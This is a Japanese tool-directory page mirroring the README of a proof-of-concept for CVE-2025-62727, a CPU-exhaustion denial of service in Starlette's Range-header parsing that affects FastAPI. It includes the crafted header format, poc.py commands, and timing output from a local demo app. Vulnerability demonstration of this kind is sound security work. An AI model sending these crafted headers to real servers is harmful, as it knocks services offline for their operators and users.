Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/ch4n3-yoon/cve-2025-62727-demo
脆弱性分析エクスプロイトウェブセキュリティAPIセキュリティ
GitHubch4n3-yoon/cve-2025-62727-demo

CVE-2025-62727-Demo

CVE-2025-62727の概念実証で、FastAPI(基盤となるStarlette <= 0.48.0)にサービス拒否を引き起こす可能性があります。

リポジトリを見る
110ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-62727 デモ

被害者アプリの説明

CVE-2025-62727 の対象となる被害者は、以下の機能を持つシンプルな FastAPI アプリです:

  • / で Hello World を返します。
  • Starlette の StaticFiles を使用して /static 配下の静的ファイルを配信します。
  • 起動時に A を N 回繰り返したテキストファイルを自動生成します(N は 1024, 2048, 50176)。

被害者アプリの実行方法

  1. (任意)virtualenv を作成して有効化します。

  2. 依存関係をインストールします:

    root@kitploit:~
    pip install -r requirements.txt
    
  3. サーバーを起動します:

    root@kitploit:~
    uvicorn main:app --reload
    
  • ブラウザで開きます:

    • http://127.0.0.1:8000/ でインデックスページを表示。
    • http://127.0.0.1:8000/static/1024.txt などで静的ファイルを表示。

    注意事項

    • 静的ファイルはアプリ起動時に static/ ディレクトリ配下に生成されます。既存のファイルは上書きされません。
    • 静的ファイル配信には、指定どおり Starlette の StaticFiles を使用しています。

    PoC: CVE-2025-62727(Range ヘッダー解析)

    同梱の poc.py は、/static ルート経由で bytes=000...000a- 形式の細工されたヘッダーを使用し、Starlette の FileResponse における CPU 負荷の高い Range 解析を引き起こします。

    サーバーを起動したら、別のシェルで以下を実行します:

    root@kitploit:~
    python3 poc.py --sizes 1000,2000,4000,7000
    

    ターゲット URL を上書きする場合(任意):

    root@kitploit:~
    python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000
    

    注意事項:

    • PoC はデフォルトで http://127.0.0.1:8000/static/50176.txt(アプリが生成するファイル)をターゲットにします。変更する場合は --url を使用してください。
    • 400/431(ヘッダーが大きすぎる)が発生する場合は --sizes を小さく調整し、ヘッダーが成功してより強い効果を得たい場合は大きく調整してください。

    実行結果の例:

    root@kitploit:~
    $ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
    [INFO] Target: http://127.0.0.1:8000/static/50176.txt
    [MODE] regex (header = 'bytes=' + '0'*N + 'a-')
    N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
    N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
    N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
    N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
    
    ツールをダウンロード